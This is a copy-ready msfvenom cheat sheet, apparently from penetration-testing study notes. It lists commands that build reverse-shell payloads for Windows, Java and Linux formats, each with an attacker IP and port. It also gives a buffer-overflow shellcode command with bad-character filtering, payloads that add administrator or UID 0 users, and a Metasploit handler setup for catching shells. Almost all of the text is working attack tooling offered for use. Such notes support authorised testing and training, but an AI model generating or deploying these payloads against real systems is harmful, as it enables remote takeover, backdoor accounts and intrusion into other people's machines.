List payloads and formats
Copy msfvenom --list payload
msfvenom --list format
Most used payloads
Windows - x86 - exe
Copy msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.233 LPORT=21 -f exe -o binary.exe
Windows - x64 - exe
Copy msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.233 LPORT=21 -f exe -o binary.exe
Windows - x64- .msi
Copy msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f msi -o reverse.msi
Windows - .dll
Copy msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.49.184 LPORT=445
Windows - .hta
Copy sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.138 LPORT=4444 -f hta-psh -o evil.hta
Windows - .asp
Useful when the webserver is Microsoft IIS. Also, try extension .aspx and .aspx-exe
Copy msfvenom -p windows/shell_reverse_tcp -f asp LHOST=10.10.16.8 LPORT=4444 -o reverse-shell.asp
.war (java/jsp)
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.2 LPORT=80 -f war > shell.war
Linux-x86 - elf
Copy msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.151 LPORT=80 -f elf -o shell.elf
Linux - x64-elf-so
Copy msfvenom -p linux/x64/shell_reverse_tcp -f elf-so -o utils.so LHOST=192.168.130.21 LPORT=80
Pour les Buffers Overflow
Windows - .c
The flag -e
is to specify the encoding.
Copy msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.218 LPORT=80 EXITFUNC=thread -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" -f c -e x86/alpha_mixed
Others payloads
Copy cmd/windows/adduser # Create a new user and add them to local administration group
linux/x86/adduser # Create a new user with UID 0
windows/adduser # Create a new user and add them to local administration group
Handlers for staged payloads
Copy msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp #to be changed according to the staged payload generated
set LPORT <port>
set LHOST <ip>
exploit -j # to put in background